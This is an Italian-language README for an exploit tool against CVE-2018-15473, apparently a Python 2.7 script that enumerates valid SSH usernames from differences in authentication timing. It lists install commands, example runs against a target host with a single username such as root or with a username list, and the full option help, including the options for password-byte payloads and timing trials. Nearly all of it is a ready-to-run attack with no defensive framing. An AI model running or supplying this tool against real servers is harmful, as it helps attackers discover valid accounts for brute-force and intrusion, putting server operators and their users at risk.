
CVE-2018-15473 Exploit
Avrai bisogno di Python 2.7 per usare questo exploit. Installa tutti i moduli elencati qui sotto in Python 2.7.
Esempio: python2 -m pip install numpy python2 -m pip install paramiko python2 -m pip install property
Per testare un singolo nome utente usa questo comando: python ./sshuserenumeration.py -u
Esempio: python ./sshuserenumeration.py -u root site.com
Per testare più nomi utente con un file di elenco - usa questo comando: python ./sshuserenumeration.py --userlist <name_list.txt>
Esempio: python ./sshuserenumeration.py --userlist users.txt site.com
usage: sshuserenumeration.py [-h] [-u USER | -U USERLIST] [-e] [-s] [--bytes BYTES] [--samples SAMPLES] [--factor FACTOR] [--trials TRIALS] host
positional arguments: host Fornisci l'indirizzo del server SSH come ip:porta o solo ip
optional arguments: -h, --help mostra questo messaggio di aiuto ed esci -u USER, --user USER Fornisci un singolo nome utente -U USERLIST, --userlist USERLIST Fornisci un file contenente un elenco di utenti -e, --enumerated Mostra solo gli utenti enumerati -s, --silent Come -e, ma solo i nomi utente verranno scritti su stdout (nessun banner, niente altro) --bytes BYTES Invia così tanti BYTE al demone SSH come password --samples SAMPLES Raccogli così tanti CAMPIONI per calcolare una linea di base temporale per autenticare utenti inesistenti --factor FACTOR Utilizzato per calcolare il limite temporale superiore per l'enumerazione degli utenti --trials TRIALS prova ad autenticare l'utente X per TRIALS volte e confronta la media dei tempi di autenticazione con il limite temporale